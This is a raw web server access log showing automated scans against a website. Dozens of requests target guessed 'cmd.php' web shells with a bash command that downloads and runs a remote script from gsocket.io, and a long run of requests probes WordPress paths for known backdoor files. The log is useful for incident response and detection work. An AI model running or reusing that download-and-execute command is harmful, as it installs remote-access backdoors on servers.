152.42.233.9 - - [15/Aug/2025:05:19:50 -0400] "GET /wp-content/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 311 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:51 -0400] "GET /wp-content/uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 319 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:51 -0400] "GET /wp-content/upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 318 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:52 -0400] "GET /wp-content/plugins/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 319 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:53 -0400] "GET /wp-admin/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 309 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:53 -0400] "GET /css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:54 -0400] "GET /js/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:54 -0400] "GET /foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 305 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:55 -0400] "GET /img/files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 310 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:56 -0400] "GET /files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 306 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:56 -0400] "GET /.tmb/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 305 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:57 -0400] "GET /tmp/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:57 -0400] "GET /server/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 307 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:58 -0400] "GET /uploads/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 313 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:59 -0400] "GET /upload/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 312 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:19:59 -0400] "GET /files/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 310 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:00 -0400] "GET /file/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 309 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:00 -0400] "GET /class/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 306 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:01 -0400] "GET /folders/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 308 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:01 -0400] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:02 -0400] "GET /upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 306 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:03 -0400] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 307 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:03 -0400] "GET /wp-content/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 310 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:04 -0400] "GET /wp-content/uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 318 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:04 -0400] "GET /wp-content/upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 317 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:05 -0400] "GET /wp-content/plugins/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 318 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:06 -0400] "GET /wp-admin/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 308 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:06 -0400] "GET /css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:07 -0400] "GET /js/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 302 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:07 -0400] "GET /foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:08 -0400] "GET /img/files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 309 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:08 -0400] "GET /files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 305 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:09 -0400] "GET /.tmb/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 304 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:09 -0400] "GET /tmp/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 303 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:10 -0400] "GET /server/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 306 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:11 -0400] "GET /uploads/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 312 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:11 -0400] "GET /upload/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 311 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:12 -0400] "GET /files/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 309 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:12 -0400] "GET /file/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 308 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:13 -0400] "GET /class/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 305 "-" "python-requests/2.32.4"
152.42.233.9 - - [15/Aug/2025:05:20:13 -0400] "GET /folders/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 307 "-" "python-requests/2.32.4"
204.16.172.106 - - [15/Aug/2025:05:20:25 -0400] "HEAD /Config/net HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.82"
68.183.245.101 - - [15/Aug/2025:05:23:19 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [15/Aug/2025:05:23:19 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [15/Aug/2025:05:23:19 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [15/Aug/2025:05:23:19 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
172.190.142.176 - - [15/Aug/2025:05:34:02 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 279 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:03 -0400] "GET /wp-includes/SimplePie/fm.php HTTP/1.1" 301 259 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:04 -0400] "GET /wp-admin/maint/wp-2019.php HTTP/1.1" 301 257 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:05 -0400] "GET /wp-content/themes/aahana/core.php HTTP/1.1" 301 264 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:05 -0400] "GET /wp-content/uploads/wp-2019.php HTTP/1.1" 301 261 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:05 -0400] "GET /uploads/classwithtostring.php HTTP/1.1" 301 260 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:06 -0400] "GET /img/function.php HTTP/1.1" 301 247 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:06 -0400] "GET /wp-includes/fonts/webadmin.php HTTP/1.1" 301 261 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:07 -0400] "GET /wp-content/themes/aahana/rk2.php HTTP/1.1" 301 263 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:08 -0400] "GET /wp-includes/theme-compat/wp-conflg.php/wp-content/plugins/google-seo-rank/mar.php HTTP/1.1" 301 312 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:08 -0400] "GET /wp-includes/sitemaps/providers/jp.php HTTP/1.1" 301 268 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:09 -0400] "GET /wp-content/filemanager.php HTTP/1.1" 301 257 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:09 -0400] "GET /wp-admin/user/atomlib.php HTTP/1.1" 301 256 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:09 -0400] "GET /.well-known/readme.php HTTP/1.1" 301 253 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:10 -0400] "GET /wp-includes/js/codemirror/media.php.INFECTED.php HTTP/1.1" 301 279 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:10 -0400] "GET /wp-includes/rest-api/endpoints/cc.php HTTP/1.1" 301 268 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:11 -0400] "GET /assets/images/core.php HTTP/1.1" 301 253 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:11 -0400] "GET /wp-admin/wp-2019.php HTTP/1.1" 301 251 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:11 -0400] "GET /wp-includes/sodium_compat/defaults.php HTTP/1.1" 301 269 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:12 -0400] "GET /wp-admin/includes/doc.php HTTP/1.1" 301 256 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:12 -0400] "GET /update/cong.php HTTP/1.1" 301 246 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:13 -0400] "GET /wp-includes/block-patterns/go.php HTTP/1.1" 301 264 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:14 -0400] "GET /wp-includes/Text/Diff/function.php HTTP/1.1" 301 265 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:14 -0400] "GET /wp-content/mu-plugins/function.php HTTP/1.1" 301 265 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:15 -0400] "GET /wp-content/themes/cay-van-phong/wp-login.php HTTP/1.1" 301 275 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:15 -0400] "GET /wp-admin/maint/ben.php HTTP/1.1" 301 253 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:16 -0400] "GET /wp-includes/SimplePie/13.php HTTP/1.1" 301 259 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:16 -0400] "GET /wp-content/languages/function.php HTTP/1.1" 301 264 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:17 -0400] "GET /wp-includes/theme-compat/wp-conflg.php/wp-content/plugins/google-seo-rank/as.php HTTP/1.1" 301 311 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:17 -0400] "GET /wp-includes/fm.php HTTP/1.1" 301 249 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:18 -0400] "GET /wp-includes/pomo/goat1.php HTTP/1.1" 301 257 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:19 -0400] "GET /cgi-bin/goat1.php HTTP/1.1" 301 248 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:19 -0400] "GET /wp-content/uploads/2024/rk2.php HTTP/1.1" 301 262 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:19 -0400] "GET /wp-includes/ID3/edit-tags.php HTTP/1.1" 301 260 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:20 -0400] "GET /wp-includes/images/wlw/hYdXrMgTbH.php HTTP/1.1" 301 268 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:21 -0400] "GET /.well-known/acme-challenge/info.php HTTP/1.1" 301 266 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:22 -0400] "GET /wp-admin/css/ben.php HTTP/1.1" 301 251 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:22 -0400] "GET /wp-includes/Text/Diff/Engine/mpvloi.php HTTP/1.1" 301 270 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:22 -0400] "GET /wp-admin/user/maint.php HTTP/1.1" 301 254 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:23 -0400] "GET /wp-includes/images/wlw/worksec.php HTTP/1.1" 301 265 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:23 -0400] "GET /.well-known/setup-config.php HTTP/1.1" 301 259 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:24 -0400] "GET /wp-includes/sodium_compat/manager.php HTTP/1.1" 301 268 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:25 -0400] "GET /js/ben.php HTTP/1.1" 301 241 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:25 -0400] "GET /wp-includes/images/smilies/log.php HTTP/1.1" 301 265 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:26 -0400] "GET /wp-admin/maint/atomlib.php HTTP/1.1" 301 257 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:26 -0400] "GET /wp-admin/js/widgets/info.php HTTP/1.1" 301 259 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:27 -0400] "GET /wp-includes/customize/media.php.INFECTED.php HTTP/1.1" 301 275 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:27 -0400] "GET /wp-includes/php-compat/yes.php HTTP/1.1" 301 261 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:28 -0400] "GET /wp-includes/classwithtostring.php HTTP/1.1" 301 264 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:28 -0400] "GET /wp-includes/sodium_compat/moon.php HTTP/1.1" 301 265 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:29 -0400] "GET /wp-includes/ID3/css_compare.php HTTP/1.1" 301 262 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:29 -0400] "GET /wp-admin/user/setup-config.php HTTP/1.1" 301 261 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:30 -0400] "GET /wp-includes/ID3/autoload_classmap.php HTTP/1.1" 301 268 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:30 -0400] "GET /wp-admin/js/02.php HTTP/1.1" 301 249 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:31 -0400] "GET /wp-admin/includes/info.php HTTP/1.1" 301 257 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:31 -0400] "GET /wp-includes/customize/13.php HTTP/1.1" 301 259 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:31 -0400] "GET /.well-known/pki-validation/02.php HTTP/1.1" 404 - "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:32 -0400] "GET /wp-includes/js/wp.php HTTP/1.1" 301 252 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:32 -0400] "GET /wp-includes/style-engine/wp_filemanager.php HTTP/1.1" 301 274 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:33 -0400] "GET /wp-admin/network/autoload_classmap.php HTTP/1.1" 301 269 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:33 -0400] "GET /wp-content/plugins/wp-help/classwithtostring.php HTTP/1.1" 301 279 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:34 -0400] "GET /cgi-bin/fucku.php HTTP/1.1" 301 248 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:34 -0400] "GET /cgi-bin/cgi-bin/simple.php HTTP/1.1" 301 257 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:35 -0400] "GET /wp-includes/images/wlw/packed.php HTTP/1.1" 301 264 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:35 -0400] "GET /cgi-bin/cgi-bin/upload.php HTTP/1.1" 301 257 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:35 -0400] "GET /wp-includes/images/smilies/chosen.php HTTP/1.1" 301 268 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:36 -0400] "GET /wp-admin/css/colors/coffee/manager.php HTTP/1.1" 301 269 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:37 -0400] "GET /.well-known/acme-challenge/up HTTP/1.1" 404 - "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:37 -0400] "GET /wp-includes/IXR/menu.php HTTP/1.1" 301 255 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:37 -0400] "GET /wp-content/upgrade-temp-backup/goat1.php HTTP/1.1" 301 271 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:38 -0400] "GET /assets/images/goat1.php HTTP/1.1" 301 254 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:39 -0400] "GET /wp-admin/user/mpvloi.php HTTP/1.1" 301 255 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:39 -0400] "GET /wp-content/themes/twentytwentytwo/simple.php HTTP/1.1" 301 275 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:39 -0400] "GET /wp-content/mu-plugins/wp-configs.php HTTP/1.1" 301 267 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:40 -0400] "GET /wp-content/themes/twentytwentytwo/alfa.php HTTP/1.1" 301 273 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:40 -0400] "GET /wp-includes/style-engine/css_compare.php HTTP/1.1" 301 271 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:41 -0400] "GET /.well-known/network.php HTTP/1.1" 301 254 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:42 -0400] "GET /wp-includes/php-compat/mah.php HTTP/1.1" 301 261 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:42 -0400] "GET /wp-content/plugins/seoplugins/go.php HTTP/1.1" 301 267 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:43 -0400] "GET /.well-known/pki-validation/core.php HTTP/1.1" 404 - "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:43 -0400] "GET /wp-content/upgrade-temp-backup/core.php HTTP/1.1" 301 270 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:43 -0400] "GET /wp-content/uploads/2024/edit-tags.php HTTP/1.1" 301 268 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:44 -0400] "GET /wp-content/yes.php HTTP/1.1" 301 249 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:44 -0400] "GET /wp-content/themes/seotheme/403.php HTTP/1.1" 301 265 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:45 -0400] "GET /wp-includes/images/smilies/cong.php HTTP/1.1" 301 266 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:45 -0400] "GET /wp-includes/media.php.INFECTED.php HTTP/1.1" 301 265 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:46 -0400] "GET /wp-admin/css/colors/blue/edit.php HTTP/1.1" 301 264 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:46 -0400] "GET /wp-includes/sitemaps/providers/packed.php HTTP/1.1" 301 272 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:47 -0400] "GET /wp-includes/js/css_compare.php HTTP/1.1" 301 261 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:48 -0400] "GET /update/install.php HTTP/1.1" 301 249 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:48 -0400] "GET /wp-admin/network/mah.php HTTP/1.1" 301 255 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:49 -0400] "GET /.well-known/acme-challenge/db.php?u HTTP/1.1" 301 266 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:49 -0400] "GET /js/wp.php HTTP/1.1" 301 240 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:49 -0400] "GET /wp-admin/css/colors/coffee/filemanager.php HTTP/1.1" 301 273 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:50 -0400] "GET /wp-includes/js/codemirror/function.php HTTP/1.1" 301 269 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:51 -0400] "GET /wp-content/themes/cay-van-phong/go.php HTTP/1.1" 301 269 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:51 -0400] "GET /wp-includes/IXR/cong.php HTTP/1.1" 301 255 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:52 -0400] "GET /wp-content/plugins/wp-help/maint.php HTTP/1.1" 301 267 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:52 -0400] "GET /wp-content/plugins/hellopress/maint.php HTTP/1.1" 301 270 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:53 -0400] "GET /wp-includes/pomo/13.php HTTP/1.1" 301 254 "-" "-"
172.190.142.176 - - [15/Aug/2025:05:34:54 -0400] "GET /wp-includes/sodium_compat/worksec.php HTTP/1.1" 301 268 "-" "-"
86.8.204.43 - - [15/Aug/2025:05:37:02 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
68.183.245.101 - - [15/Aug/2025:05:37:02 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [15/Aug/2025:05:37:02 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [15/Aug/2025:05:37:02 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
43.153.119.119 - - [15/Aug/2025:05:43:05 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
68.183.245.101 - - [15/Aug/2025:05:51:53 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [15/Aug/2025:05:51:53 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [15/Aug/2025:05:51:53 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [15/Aug/2025:05:51:53 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
216.10.244.79 - - [15/Aug/2025:05:54:12 -0400] "GET /.well-known/pki-validation/about.php HTTP/1.1" 404 - "-" "get_local:DCV"
216.10.244.79 - - [15/Aug/2025:05:54:16 -0400] "GET /.well-known/pki-validation/cloud.php HTTP/1.1" 404 - "-" "get_local:DCV"
216.10.244.79 - - [15/Aug/2025:05:54:35 -0400] "GET /.well-known/pki-validation/xmrlpc.php%3fp= HTTP/1.1" 404 - "-" "get_local:DCV"
68.183.245.101 - - [15/Aug/2025:06:06:17 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [15/Aug/2025:06:06:17 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [15/Aug/2025:06:06:17 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [15/Aug/2025:06:06:18 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
173.252.87.2 - - [15/Aug/2025:06:17:06 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.230.115 - - [15/Aug/2025:06:20:13 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
